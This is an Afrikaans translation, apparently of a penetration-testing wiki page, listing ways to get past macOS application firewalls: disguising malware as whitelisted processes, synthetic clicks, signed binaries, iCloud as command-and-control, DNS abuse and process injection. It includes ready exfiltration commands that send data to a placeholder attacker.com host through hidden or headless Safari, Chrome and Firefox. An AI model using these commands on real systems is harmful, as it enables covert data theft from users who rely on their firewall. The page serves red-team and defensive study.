macOS Bypassing Firewalls

Gevonde tegnieke

Die volgende tegnieke is gevind wat werk in sommige macOS deurbrandtoepassings.

Misbruik van witlysname

• Byvoorbeeld om die kwaadwillige sagteware te noem met name van bekende macOS prosesse soos launchd

Sintetiese Kliek

• As die deurbranders toestemming aan die gebruiker vra, laat die kwaadwillige sagteware toestemming gee

Gebruik Apple-ondertekende binêre lêers

• Soos curl, maar ook ander soos whois

Bekende apple-domeine

Die deurbranders kan verbindinge toelaat na bekende apple-domeine soos apple.com of icloud.com. En iCloud kan gebruik word as 'n C2.

Generiese Omseiling

Sommige idees om deurbranders te probeer omseil

Kontroleer toegelate verkeer

Om die toegelate verkeer te ken sal jou help om potensieel witlys-domeine te identifiseer of watter toepassings toegelaat word om daartoe toegang te verkry

lsof -i TCP -sTCP:ESTABLISHED

Misbruik van DNS

DNS-oplossings word gedoen via die mdnsreponder ondertekende aansoek wat waarskynlik toegelaat sal word om DNS-bedieners te kontak.

Via Blaaier-toepassings

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Vuurvos

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Via prosesinspuitings

Indien jy kode in 'n proses kan inspuit wat toegelaat word om met enige bediener te verbind, kan jy die vuurmuurbeveiligings omseil:

Verwysings

• https://www.youtube.com/watch?v=UlT5KFTMn2k